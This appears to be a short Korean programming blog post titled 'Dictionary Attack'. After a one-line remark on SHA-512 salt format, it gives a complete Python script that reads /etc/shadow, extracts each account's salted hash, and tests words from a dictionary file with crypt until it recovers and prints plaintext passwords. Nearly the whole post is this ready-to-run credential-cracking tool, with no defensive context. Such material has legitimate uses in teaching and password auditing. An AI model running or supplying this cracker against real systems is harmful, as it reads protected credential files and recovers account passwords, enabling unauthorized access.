코딩/Python

Dictionary Attack

비니화이팅 2020. 3. 4. 11:29

 - SHA-512는 $6을 포함하여 11자리를 사용자가 입력한 패스워드와 해쉬화한다.

 

 

import sys
import os
import crypt

account={}

def arg_check(argv):
    if (len(argv)) != 2 :
        print('Usage : crack [Dictionary_file]')
        sys.exit(1)
    if os.path.isfile(argv[1]) != 1 :
        print('No such Dictionary_file')
        sys.exit(1)

def main():
    with open('/etc/shadow', 'r') as s_f : 
        while True :
            s_line = s_f.readline()
            if not s_line : break
            values = s_line.split(":")
            if values[1]=='x' or values[1]=='!' or values[1]=='*' : continue
            pass_field=values[1].split("$")
            hash='$'+pass_field[1]+'$'+pass_field[2]
            find_passwd(values, hash)
    for id in account :
        if account[id]!=None : print('id -> [%s]  password -> [%s] ' %((id), account[id]))
        else : print('id -> [%s] Password not found.' %id)

def find_passwd(values, hash):
    account[values[0]]=None
    with open(sys.argv[1], 'r') as d_f : 
        while True :
            word = d_f.readline()
            if not word : break
            result=crypt.crypt(word.strip('\n'), hash)
            if result==values[1]:
                account[values[0]]=word.strip('\n')
                break

if __name__ == "__main__" :
    arg_check(sys.argv)
    main()
​